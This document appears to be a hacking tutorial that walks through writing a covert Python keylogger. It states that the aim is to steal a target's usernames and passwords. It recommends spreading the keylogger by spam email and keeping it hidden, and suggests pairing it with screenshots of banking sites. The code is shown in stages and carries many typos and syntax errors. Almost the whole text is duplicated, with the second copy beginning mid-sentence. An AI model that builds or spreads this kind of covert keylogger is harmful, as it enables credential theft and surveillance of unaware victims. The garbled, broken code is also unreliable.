Hacking tool : Using a Keylogger to Gain Information
Another type of attack that can be useful for hackers is to add a keylogger to the
target computer. This allows them to see what information is being typed into the
system and sometimes, when they add in a screenshot tool, they can even see what
kinds of websites the target is using and the information they type in at the same
time. We are going to use the Python language to help capture all the keystrokes
that the target is placing into the computer in order to get ahold of username and
passwords to use later on. So, let’s get started!
Logging the keystrokes
So, the first thing we need to do is to figure out how to make the program that is
needed for keylogging You may find that one of the easiest ways to get ahold of the
information you want from the user is through their username and passwords, but
how do you get ahold of their password? It is possible to go through some of the
techniques that we talked about before, such as guessing and typing in words from
the dictionary, but this can take a very long time. And as some people are updating
their passwords and making them a bit harder and more complex, a hacker could
spend hours trying to figure it out.
As you can imagine, no hacker really wants to spend their time trying to guess the
password because that is such a waste. And if the user ends up changing their
password at any time, they have just wasted all that valuable time as well. This is
why hackers have come up with a more advanced way to figure out the password,
saving them time and getting the information sent to them, rather than having to
worry about using a brute force attack. The keylogger is effective because it doestake a look at all the strokes that the user pushes on the keyboard and then sends it
over to the hacker. If the hacker does this right, they will be able to get all the
information, and more, out of this.
There are several ways that you can get a keylogger to load into the target’s
computer. The easiest method to use is to send out a spamming email and having
the user download it, often without being aware. You want to make sure that the
user never becomes aware that the keylogger is there, or you are going to run into
trouble.
Now, we are going to take a look at the different parts of working on the
keylogger. The first part is just going to tell the computer that it needs to listen to
the keystrokes of the person you are targeting. The code that will make this happen
includes:
import pyHook
import pythoncom
def keypress(event):
if even.Ascii:
char = chr(event.Ascii)
print char
if char = = “~”:
exit()
hm = pyHook.HookManager()
hm.KeyDown = keypress
hm.HookKeyboard()
pythoncom.PumpMessages()
This one is helpful because it helps you to download the two libraries that you
need to get the whole keylogger done. The first of these libraries is known as the
pyHook, which is the one in charge of listening for any low-level activity on the
computer, such as the keystrokes and the movement of the mouse. You may need to
download this into your computer if you don’t already have it there.
The second library that we will use is known as the pythoncom. This one is the
main toolkit that you are able to use with Microsoft and it will make sure that all
the different processes that you are working with can communicate with each
other. For example, the library for pythoncom is going to help make sure that you
receive notifications of the new keystrokes that you are using.
Now that the initial imports have gone through, it is time to define the function. In
this case, it is going to be the key press, which is going to be the part that receives
the event object. Your function will then interpret the event object and then that
object is going to respond in some way, based on the content of that event. This is
an important spot because it is where you are able to make a few improvements as
you expand out your script. In the form that we used earlier, the code is set up to
see if the user input was a character of ASCII. If this is found to be true, that is
when the “stdout” will print. Then you are able to check whether the input
character is the “~”. If it is the second one, the script is going to exit.
This second exit option is important and will come in handy when you need to test
out your script, but you do need to watch out for things because it is important that
the target never has access to this. Make sure that your comment is going to have
the “if statement” before you send out the keylogger, or there can often be issues.
Before we move on, let’s take a look at the last few lines of the code. These are
important because you will instantiate the HookManager object. In this code, thisis going to be the main workhorse for your libraries. This particular code is going
to let the HookManager know that it will need to listen for and respond to the
keystrokes that are in the system by simply sending them to the keypress function.
It then moves on to calling up the method of Hook Keyboard so that it will start
listening for the inputs that come on the keyboard. And then the end of this code is
going to make sure that the inputs are passed on to the HookManager.
Now we are going to take some time to fire up the code from above. Once that is
loaded on your computer, it is time to test it out. For this, just press a key and you
should see that on every line, a new symbol is going to show up. But when you
press on the “~” symbol, the code will exit and stop recording. If the keystrokes
are showing up, your code is working well, but it won’t take long for you to see
that there are a few issues with the way that you are getting the output, so we need
to keep moving on.
Right now, the biggest issue with this code is that it is printing out right on the
screen. This means that your user will be able to see that their keystrokes are
being watched and they will go and find someone who can take the keylogger off,
rather than continue typing. If these symbols keep coming up on their computer,
you have to make some changes if you still want to get the information.
Another issue that we are going to work on fixing is putting a timestamp on the
information. Right now you see that the symbols are being typed, but without
knowing the time, it is hard to know which symbols go together and which ones
are far apart. We are able to go through and work on adding in a timestamp so that
it is easier to see some of the patterns that come up.
It is pretty easy to fix both of these issues so that you are able to get the
information that you need without having to worry about the target user seeing
what you are doing. The code that you can use to make this happen includes:
from datetime import *
import os
root_dir = os.path.split(os.path.realpath(_file_))[0]
log_file = os.path.join(root_dir, “log_file.txt”)
def log(message):
if len(message) > 0:
with open(log_file, “a”) as f:
f.write(“{}:\t{}\n” .format(datetime.now(), message))
# print “{}:\t{}” .format(datetime.not(), message)
This point in the code is creating a keylogger, rather than a code that is just for
watching the keys. The first thing that we did was add in a datetime library so that
it can block together the statements that are important. This basically makes it so
much easier to see what times things were typed into the program and see the
patterns. Then we moved on to define the filename where the data that you collect
is stored. And then the third thing we did was create a log function, which will
take the string values to get the file logged.
When testing out this script, if you want to see what the user is writing out in real
time, you will be able to uncomment the as time so that this same message can be
printed to stdout while the script is running.
At this point, there are a few more issues that stand out. The most noticeable is
that the words are all coming out one letter per line, which makes it really hard to
read. We are able to go through and make it so that you have chunks of text that
will come in together, along with the timestamp, so that you can actually see
whole words and not just letters.
buffer = “”
def keypress(event)
global bugger
if event.Ascii
char = chr(event.Ascii)
if char = = “~”:
log(bugger)
log(“---PROGRAM ENDED---“)
exit()
if event.Ascii ==13:
buffer += “<ENTER>\n”
log(buffer)
bugger = “”
elif event.Ascii==8:
buffer += “<BACKSP ACE>”
elif event.Ascii==9:
buffer += “<TAB>”
else:
buffer += char
pause_period = 2
las_press = datetime.now()
pause_delta = timedelta(seconds=pause_period)
def keypress(event):
global butter, last_press
if event.Ascii:
char = chr(event.Ascii)
if char == “~”:
log(buffer)
log(“---PROGRAM ENDED---“)
exit()
pause = datetime.now()-last_press
if pause >= pause_delta:
log(buffer)
buffer = “”
if event.Ascii ==13:
buffer += “<ENTER>”
elif event.Ascii==8:
buffer += “<BACKSP ACE>”
elif event.Ascii==9:
buffer += “<TAB>”
else:
buffer += char
last_press = datetime.now()
This code has also gone on to add in for periods, special characters, and anything
else that the target user may try to put into the computer. Once the target user has
opened up the keylogger and started typing, you will be able to see what is going
on with their own writing and often you will start to notice some patterns.
While we will not discuss it here, another thing that you are able to add in with
your keylogger to make it more efficient and easier to use is a screenshot tool This
tool is able to take screenshots of the websites and other things that the user is on
and send them back to the hacker. This can be nice because the hacker will be able
to look at a screenshot, see that the user went to a bank website or another
personal website, and then they will be able to compare timestamps with the
keylogger to see what usernames and passwords were used.
A keylogger, when done properly, can be a great tool for the hacker. It allows them
to have access to a lot of information that would be hard to get otherwise. Use the
code above, and maybe some spamming techniques to get the user to open it up,
and you can see all the strokes that they use on the keyboard.
target computer. This allows them to see what information is being typed into the
system and sometimes, when they add in a screenshot tool, they can even see what
kinds of websites the target is using and the information they type in at the same
time. We are going to use the Python language to help capture all the keystrokes
that the target is placing into the computer in order to get ahold of username and
passwords to use later on. So, let’s get started!
Logging the keystrokes
So, the first thing we need to do is to figure out how to make the program that is
needed for keylogging You may find that one of the easiest ways to get ahold of the
information you want from the user is through their username and passwords, but
how do you get ahold of their password? It is possible to go through some of the
techniques that we talked about before, such as guessing and typing in words from
the dictionary, but this can take a very long time. And as some people are updating
their passwords and making them a bit harder and more complex, a hacker could
spend hours trying to figure it out.
As you can imagine, no hacker really wants to spend their time trying to guess the
password because that is such a waste. And if the user ends up changing their
password at any time, they have just wasted all that valuable time as well. This is
why hackers have come up with a more advanced way to figure out the password,
saving them time and getting the information sent to them, rather than having to
worry about using a brute force attack. The keylogger is effective because it doestake a look at all the strokes that the user pushes on the keyboard and then sends it
over to the hacker. If the hacker does this right, they will be able to get all the
information, and more, out of this.
There are several ways that you can get a keylogger to load into the target’s
computer. The easiest method to use is to send out a spamming email and having
the user download it, often without being aware. You want to make sure that the
user never becomes aware that the keylogger is there, or you are going to run into
trouble.
Now, we are going to take a look at the different parts of working on the
keylogger. The first part is just going to tell the computer that it needs to listen to
the keystrokes of the person you are targeting. The code that will make this happen
includes:
import pyHook
import pythoncom
def keypress(event):
if even.Ascii:
char = chr(event.Ascii)
print char
if char = = “~”:
exit()
hm = pyHook.HookManager()
hm.KeyDown = keypress
hm.HookKeyboard()
pythoncom.PumpMessages()
This one is helpful because it helps you to download the two libraries that you
need to get the whole keylogger done. The first of these libraries is known as the
pyHook, which is the one in charge of listening for any low-level activity on the
computer, such as the keystrokes and the movement of the mouse. You may need to
download this into your computer if you don’t already have it there.
The second library that we will use is known as the pythoncom. This one is the
main toolkit that you are able to use with Microsoft and it will make sure that all
the different processes that you are working with can communicate with each
other. For example, the library for pythoncom is going to help make sure that you
receive notifications of the new keystrokes that you are using.
Now that the initial imports have gone through, it is time to define the function. In
this case, it is going to be the key press, which is going to be the part that receives
the event object. Your function will then interpret the event object and then that
object is going to respond in some way, based on the content of that event. This is
an important spot because it is where you are able to make a few improvements as
you expand out your script. In the form that we used earlier, the code is set up to
see if the user input was a character of ASCII. If this is found to be true, that is
when the “stdout” will print. Then you are able to check whether the input
character is the “~”. If it is the second one, the script is going to exit.
This second exit option is important and will come in handy when you need to test
out your script, but you do need to watch out for things because it is important that
the target never has access to this. Make sure that your comment is going to have
the “if statement” before you send out the keylogger, or there can often be issues.
Before we move on, let’s take a look at the last few lines of the code. These are
important because you will instantiate the HookManager object. In this code, thisis going to be the main workhorse for your libraries. This particular code is going
to let the HookManager know that it will need to listen for and respond to the
keystrokes that are in the system by simply sending them to the keypress function.
It then moves on to calling up the method of Hook Keyboard so that it will start
listening for the inputs that come on the keyboard. And then the end of this code is
going to make sure that the inputs are passed on to the HookManager.
Now we are going to take some time to fire up the code from above. Once that is
loaded on your computer, it is time to test it out. For this, just press a key and you
should see that on every line, a new symbol is going to show up. But when you
press on the “~” symbol, the code will exit and stop recording. If the keystrokes
are showing up, your code is working well, but it won’t take long for you to see
that there are a few issues with the way that you are getting the output, so we need
to keep moving on.
Right now, the biggest issue with this code is that it is printing out right on the
screen. This means that your user will be able to see that their keystrokes are
being watched and they will go and find someone who can take the keylogger off,
rather than continue typing. If these symbols keep coming up on their computer,
you have to make some changes if you still want to get the information.
Another issue that we are going to work on fixing is putting a timestamp on the
information. Right now you see that the symbols are being typed, but without
knowing the time, it is hard to know which symbols go together and which ones
are far apart. We are able to go through and work on adding in a timestamp so that
it is easier to see some of the patterns that come up.
It is pretty easy to fix both of these issues so that you are able to get the
information that you need without having to worry about the target user seeing
what you are doing. The code that you can use to make this happen includes:
from datetime import *
import os
root_dir = os.path.split(os.path.realpath(_file_))[0]
log_file = os.path.join(root_dir, “log_file.txt”)
def log(message):
if len(message) > 0:
with open(log_file, “a”) as f:
f.write(“{}:\t{}\n” .format(datetime.now(), message))
# print “{}:\t{}” .format(datetime.not(), message)
This point in the code is creating a keylogger, rather than a code that is just for
watching the keys. The first thing that we did was add in a datetime library so that
it can block together the statements that are important. This basically makes it so
much easier to see what times things were typed into the program and see the
patterns. Then we moved on to define the filename where the data that you collect
is stored. And then the third thing we did was create a log function, which will
take the string values to get the file logged.
When testing out this script, if you want to see what the user is writing out in real
time, you will be able to uncomment the as time so that this same message can be
printed to stdout while the script is running.
At this point, there are a few more issues that stand out. The most noticeable is
that the words are all coming out one letter per line, which makes it really hard to
read. We are able to go through and make it so that you have chunks of text that
will come in together, along with the timestamp, so that you can actually see
whole words and not just letters.
buffer = “”
def keypress(event)
global bugger
if event.Ascii
char = chr(event.Ascii)
if char = = “~”:
log(bugger)
log(“---PROGRAM ENDED---“)
exit()
if event.Ascii ==13:
buffer += “<ENTER>\n”
log(buffer)
bugger = “”
elif event.Ascii==8:
buffer += “<BACKSP ACE>”
elif event.Ascii==9:
buffer += “<TAB>”
else:
buffer += char
pause_period = 2
las_press = datetime.now()
pause_delta = timedelta(seconds=pause_period)
def keypress(event):
global butter, last_press
if event.Ascii:
char = chr(event.Ascii)
if char == “~”:
log(buffer)
log(“---PROGRAM ENDED---“)
exit()
pause = datetime.now()-last_press
if pause >= pause_delta:
log(buffer)
buffer = “”
if event.Ascii ==13:
buffer += “<ENTER>”
elif event.Ascii==8:
buffer += “<BACKSP ACE>”
elif event.Ascii==9:
buffer += “<TAB>”
else:
buffer += char
last_press = datetime.now()
This code has also gone on to add in for periods, special characters, and anything
else that the target user may try to put into the computer. Once the target user has
opened up the keylogger and started typing, you will be able to see what is going
on with their own writing and often you will start to notice some patterns.
While we will not discuss it here, another thing that you are able to add in with
your keylogger to make it more efficient and easier to use is a screenshot tool This
tool is able to take screenshots of the websites and other things that the user is on
and send them back to the hacker. This can be nice because the hacker will be able
to look at a screenshot, see that the user went to a bank website or another
personal website, and then they will be able to compare timestamps with the
keylogger to see what usernames and passwords were used.
A keylogger, when done properly, can be a great tool for the hacker. It allows them
to have access to a lot of information that would be hard to get otherwise. Use the
code above, and maybe some spamming techniques to get the user to open it up,
and you can see all the strokes that they use on the keyboard.
